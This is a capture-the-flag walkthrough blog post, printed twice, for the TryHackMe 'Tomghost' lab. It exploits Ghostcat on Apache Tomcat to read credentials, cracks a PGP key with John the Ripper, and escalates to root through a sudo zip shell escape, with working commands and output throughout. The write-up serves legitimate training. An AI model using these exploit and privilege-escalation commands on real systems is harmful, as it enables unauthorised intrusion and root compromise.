12-15-2022, 07:36 AM
Tomghost “Try Hack Me” Walkthrough (Hacked)
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"979801","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</div>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="160" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-220-1024x160.png" alt="" class="wp-image-981133" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-220-1024x160.png 1024w, https://blog.finxter.com/wp-content/uplo...300x47.png 300w, https://blog.finxter.com/wp-content/uplo...68x120.png 768w, https://blog.finxter.com/wp-content/uplo...36x240.png 1536w, https://blog.finxter.com/wp-content/uplo...ge-220.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><a href="https://tryhackme.com/room/tomghost" data-type="URL" data-id="https://tryhackme.com/room/tomghost" target="_blank" rel="noreferrer noopener">TryHackMe Challenge – Tomghost</a></figcaption></figure>
</div>
<p>In this CTF (Capture the Flag) challenge walkthrough, we will be hacking into an Apache Tomcat server using an exploit created by a Chinese developer. </p>
<p>This exploit is available as a standalone Python file and as a Metasploit module. </p>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tomghost-try-hack-me-walkthrough-hacked/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FB4JQCoxZmmU%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<p>In the walkthrough video, I’ll demonstrate both methods of gaining an initial foothold into the box. We will use a trusty hash cracking tool, <strong><em>John the ripper</em></strong> to decrypt a password from two files found on the target machine. </p>
<p>Logging in as the second user, we can leverage our permissions to run the zip bin as root in order to retrieve the root flag.</p>
<p>Please note that this box contains a username with foul language. If you are easily offended by bad words, please don’t continue reading this walkthrough. </p>
<h2>ENUMERATION</h2>
<p>First, let’s export our IPs and enumerate with <code>nmap</code>.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export myIP=10.6.2.23
export targetIP=10.10.225.99 sudo nmap -Pn -sC -p- -O $targetIP
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="479" height="223" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-219.png" alt="" class="wp-image-981125" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-219.png 479w, https://blog.finxter.com/wp-content/uplo...00x140.png 300w" sizes="(max-width: 479px) 100vw, 479px" /></figure>
</div>
<p>Next we will look further into the port 8009 service <code>ajp13</code> with some searching on Google. We quickly discover that it looks like a tomcat apache server that has a vulnerability that can be exploited with <a href="https://github.com/00theway/Ghostcat-CNVD-2020-10487" target="_blank" rel="noreferrer noopener">Ghostcat</a>. </p>
<h2>INITIAL FOOTHOLD WITH GHOSTCAT</h2>
<p>Using <code>metasploit</code> with the <code>ghostcat</code> module, we can retrieve the first user’s username and password. Also of interest is port 8080 running an HTTP-proxy. This is probably a webpage we can look at in a browser. </p>
<p>The other method for retrieving the first username and password is to run the following command to use <code>ajpShooter.py</code> directly without <code>metasploit</code>:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python ajpShooter.py http://10.10.176.124:8080 8009 /WEB-INF/web.xml read
--- _ _ __ _ _ /_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __ //_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__| / _ \| | |_) | _\ \ | | | (_) | (_) | || __/ | \_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_| |__/|_| 00theway,just for test [<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"1261-1583902632000"
[<] Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT
[<] Content-Type: application/xml
[<] Content-Length: 1261 <?xml version="1.0" encoding="UTF-8"?>
<!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version="4.0" metadata-complete="true"> <display-name>Welcome to Tomcat</display-name> <description> Welcome to GhostCat skyfuck:8730281lkjlkjdqlksalks </description> </web-app>
****
**---**
</pre>
</p>
<h2>SSH INTO THE TARGET MACHINE</h2>
<p>Now that we have retrieved the <code>user:password</code>, we can go ahead an SSH into the box.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh [email protected]
Password: 8730281lkjlkjdqlksalks</pre>
<p>During further enumeration, we discovered two files: <code>tryhackme.asc</code>, and <code>credential.pgp</code>. These files will probably help us uncover another hidden string. The <code>.pgp</code> file contains a hash that, when cracked, reveals a key to decrypt the <code>.asc</code> file.</p>
<p>First, we need to transfer both files to our attacker machine so that we can use john the ripper to decrypt the hash. We can use <strong>SCP</strong> (secure copy protocol to transfer the files). </p>
<p>The following commands allow us to uncover the hidden string, which turns out to be another <code>username:password</code> combination.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo scp [email protected]:/home/skyfuck/credential.pgp ~/THM/tomghost/credential.pgp sudo scp [email protected]:/home/skyfuck/tryhackme.asc ./tomghost/tryhackme.asc
</pre>
<h2>DECRYPTING THE HIDDEN SECRET WITH JOHN THE RIPPER</h2>
<p>On our attacker machine we can run <code>john2hash</code> to nicely convert the <code>.asc</code> file into a new file packed up for john the ripper, titled “hash”.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">john2hash tryhackme.asc > hash</pre>
<p>And finally, we can run john the ripper now to decrypt the <code>credential.pgp</code> file.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">John – wordlist=/home/kalisurfer/hacking-tools/SecLists/Passwords/Leaked-Databases/rockyou/rockyou.txt hash</pre>
<p>The <code>rockyou.txt</code> file is a leaked database of passwords that is often used in pentesting. Once we crack the hash, we will use the following commands to decrypt the <code>credential.pgp</code> file.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">gpg – import tryhackme.asc
sudo gpg – decrypt credential.pgp
</pre>
<p>And we have it!</p>
<p>merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j%</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">!!!
THM{GhostCat_1s_so_cr4sy}
!!!
</pre>
<h2>EXPLOITING SUDO PERMISSIONS ON ZIP</h2>
<p>First, we need to switch over the user Merlin with: </p>
<p><code>su merlin</code></p>
<p>We discover with a <code>sudo -l</code> search that we have sudo permissions to run the zip bin. </p>
<p>Over on <a href="https://gtfobins.github.io/" target="_blank" rel="noreferrer noopener">GTFObins</a> we find a privilege escalation vector using zip to maintain SUDO permissions and retrieve the root flag:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">merlin@ubuntu:/usr/bin$ TF=$(mktemp -u)
merlin@ubuntu:/usr/bin$ sudo zip $TF /etc/hosts -T -TT 'sh #' adding: etc/hosts (deflated 31%)
# whoami
root
# cd /root
# ls
root.txt ufw
# cat root.txt
THM{Z1P_1S_FAKE}
</pre>
<p>Thanks for reading/watching my walkthrough.</p>
</div>
https://www.sickgaming.net/blog/2022/12/...gh-hacked/
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"979801","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</div>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="160" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-220-1024x160.png" alt="" class="wp-image-981133" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-220-1024x160.png 1024w, https://blog.finxter.com/wp-content/uplo...300x47.png 300w, https://blog.finxter.com/wp-content/uplo...68x120.png 768w, https://blog.finxter.com/wp-content/uplo...36x240.png 1536w, https://blog.finxter.com/wp-content/uplo...ge-220.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><a href="https://tryhackme.com/room/tomghost" data-type="URL" data-id="https://tryhackme.com/room/tomghost" target="_blank" rel="noreferrer noopener">TryHackMe Challenge – Tomghost</a></figcaption></figure>
</div>
<p>In this CTF (Capture the Flag) challenge walkthrough, we will be hacking into an Apache Tomcat server using an exploit created by a Chinese developer. </p>
<p>This exploit is available as a standalone Python file and as a Metasploit module. </p>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tomghost-try-hack-me-walkthrough-hacked/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FB4JQCoxZmmU%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<p>In the walkthrough video, I’ll demonstrate both methods of gaining an initial foothold into the box. We will use a trusty hash cracking tool, <strong><em>John the ripper</em></strong> to decrypt a password from two files found on the target machine. </p>
<p>Logging in as the second user, we can leverage our permissions to run the zip bin as root in order to retrieve the root flag.</p>
<p>Please note that this box contains a username with foul language. If you are easily offended by bad words, please don’t continue reading this walkthrough. </p>
<h2>ENUMERATION</h2>
<p>First, let’s export our IPs and enumerate with <code>nmap</code>.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export myIP=10.6.2.23
export targetIP=10.10.225.99 sudo nmap -Pn -sC -p- -O $targetIP
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="479" height="223" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-219.png" alt="" class="wp-image-981125" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-219.png 479w, https://blog.finxter.com/wp-content/uplo...00x140.png 300w" sizes="(max-width: 479px) 100vw, 479px" /></figure>
</div>
<p>Next we will look further into the port 8009 service <code>ajp13</code> with some searching on Google. We quickly discover that it looks like a tomcat apache server that has a vulnerability that can be exploited with <a href="https://github.com/00theway/Ghostcat-CNVD-2020-10487" target="_blank" rel="noreferrer noopener">Ghostcat</a>. </p>
<h2>INITIAL FOOTHOLD WITH GHOSTCAT</h2>
<p>Using <code>metasploit</code> with the <code>ghostcat</code> module, we can retrieve the first user’s username and password. Also of interest is port 8080 running an HTTP-proxy. This is probably a webpage we can look at in a browser. </p>
<p>The other method for retrieving the first username and password is to run the following command to use <code>ajpShooter.py</code> directly without <code>metasploit</code>:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python ajpShooter.py http://10.10.176.124:8080 8009 /WEB-INF/web.xml read
--- _ _ __ _ _ /_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __ //_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__| / _ \| | |_) | _\ \ | | | (_) | (_) | || __/ | \_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_| |__/|_| 00theway,just for test [<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"1261-1583902632000"
[<] Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT
[<] Content-Type: application/xml
[<] Content-Length: 1261 <?xml version="1.0" encoding="UTF-8"?>
<!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version="4.0" metadata-complete="true"> <display-name>Welcome to Tomcat</display-name> <description> Welcome to GhostCat skyfuck:8730281lkjlkjdqlksalks </description> </web-app>
****
**---**
</pre>
</p>
<h2>SSH INTO THE TARGET MACHINE</h2>
<p>Now that we have retrieved the <code>user:password</code>, we can go ahead an SSH into the box.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh [email protected]
Password: 8730281lkjlkjdqlksalks</pre>
<p>During further enumeration, we discovered two files: <code>tryhackme.asc</code>, and <code>credential.pgp</code>. These files will probably help us uncover another hidden string. The <code>.pgp</code> file contains a hash that, when cracked, reveals a key to decrypt the <code>.asc</code> file.</p>
<p>First, we need to transfer both files to our attacker machine so that we can use john the ripper to decrypt the hash. We can use <strong>SCP</strong> (secure copy protocol to transfer the files). </p>
<p>The following commands allow us to uncover the hidden string, which turns out to be another <code>username:password</code> combination.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo scp [email protected]:/home/skyfuck/credential.pgp ~/THM/tomghost/credential.pgp sudo scp [email protected]:/home/skyfuck/tryhackme.asc ./tomghost/tryhackme.asc
</pre>
<h2>DECRYPTING THE HIDDEN SECRET WITH JOHN THE RIPPER</h2>
<p>On our attacker machine we can run <code>john2hash</code> to nicely convert the <code>.asc</code> file into a new file packed up for john the ripper, titled “hash”.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">john2hash tryhackme.asc > hash</pre>
<p>And finally, we can run john the ripper now to decrypt the <code>credential.pgp</code> file.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">John – wordlist=/home/kalisurfer/hacking-tools/SecLists/Passwords/Leaked-Databases/rockyou/rockyou.txt hash</pre>
<p>The <code>rockyou.txt</code> file is a leaked database of passwords that is often used in pentesting. Once we crack the hash, we will use the following commands to decrypt the <code>credential.pgp</code> file.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">gpg – import tryhackme.asc
sudo gpg – decrypt credential.pgp
</pre>
<p>And we have it!</p>
<p>merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j%</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">!!!
THM{GhostCat_1s_so_cr4sy}
!!!
</pre>
<h2>EXPLOITING SUDO PERMISSIONS ON ZIP</h2>
<p>First, we need to switch over the user Merlin with: </p>
<p><code>su merlin</code></p>
<p>We discover with a <code>sudo -l</code> search that we have sudo permissions to run the zip bin. </p>
<p>Over on <a href="https://gtfobins.github.io/" target="_blank" rel="noreferrer noopener">GTFObins</a> we find a privilege escalation vector using zip to maintain SUDO permissions and retrieve the root flag:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">merlin@ubuntu:/usr/bin$ TF=$(mktemp -u)
merlin@ubuntu:/usr/bin$ sudo zip $TF /etc/hosts -T -TT 'sh #' adding: etc/hosts (deflated 31%)
# whoami
root
# cd /root
# ls
root.txt ufw
# cat root.txt
THM{Z1P_1S_FAKE}
</pre>
<p>Thanks for reading/watching my walkthrough.</p>
</div>
https://www.sickgaming.net/blog/2022/12/...gh-hacked/